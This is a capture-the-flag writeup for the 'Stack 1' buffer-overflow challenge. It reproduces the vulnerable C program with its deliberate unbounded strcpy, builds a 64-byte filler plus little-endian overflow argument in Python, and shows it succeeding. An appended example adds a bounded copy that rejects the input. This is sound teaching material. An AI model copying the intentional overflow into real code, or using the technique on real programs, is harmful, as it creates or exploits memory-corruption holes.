hacking-writeups

View the Project on GitHub HarishgunaS/hacking-writeups

Stack 1

Stack 1 source

#include <err.h>     /* errx() */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  /* Unbounded copy: an argument longer than 63 bytes writes past buffer */
  strcpy(buffer, argv[1]);

  /* 0x61626364 is the integer whose bytes are 'a' 'b' 'c' 'd' */
  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

This program does not read from stdin, so input cannot be piped to it. It requires a command-line argument instead.

Instead of manually crafting an input argument, I created one using Python.

print("A"*64 + "\x64\x63\x62\x61")

Output

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba

Shell command

./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba

Output

you have correctly got the variable to the right value

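This was another simple buffer overflow, but this time the value to write must be crafted carefully. The order in which the bytes are written matters: the target value 0x61626364 is stored in little-endian representation, so its bytes are supplied least significant first (\x64\x63\x62\x61, which prints as "dcba").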
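
The byte order described above, together with a bounded replacement for the strcpy() call, as an added example that is not part of the original writeup or the challenge source. The names le32_from_bytes, copy_checked and check_payload are hypothetical, and the payload is constructed inline to match the argument shown above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64 /* same size as buffer[] in stack1 */

/* Read four bytes as a little-endian CPU loads an int:
   the byte at the lowest address is the least significant. */
uint32_t le32_from_bytes(const unsigned char b[4])
{
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Bounded stand-in for strcpy(buffer, argv[1]): copies only when src and
   its NUL terminator fit in dst. Returns 0 on success, -1 when rejected. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Constructed input: 64 filler bytes followed by "dcba", as in the writeup.
   Sets *rejected to 1 if the bounded copy refuses it, and returns the int
   that the four trailing bytes encode. */
uint32_t check_payload(int *rejected)
{
    char payload[BUF_SIZE + 4 + 1];
    char buffer[BUF_SIZE] = "";

    memset(payload, 'A', BUF_SIZE);
    memcpy(payload + BUF_SIZE, "dcba", 5); /* includes the NUL */
    *rejected = (copy_checked(buffer, sizeof buffer, payload) != 0);
    return le32_from_bytes((const unsigned char *)payload + BUF_SIZE);
}

int main(void)
{
    int rejected;
    uint32_t value = check_payload(&rejected);
    printf("trailing bytes as int: 0x%08x, rejected: %d\n",
           (unsigned)value, rejected);
    return 0;
}
```

With the length check in place the 68-byte argument is refused before any byte reaches buffer, so modified keeps the value 0.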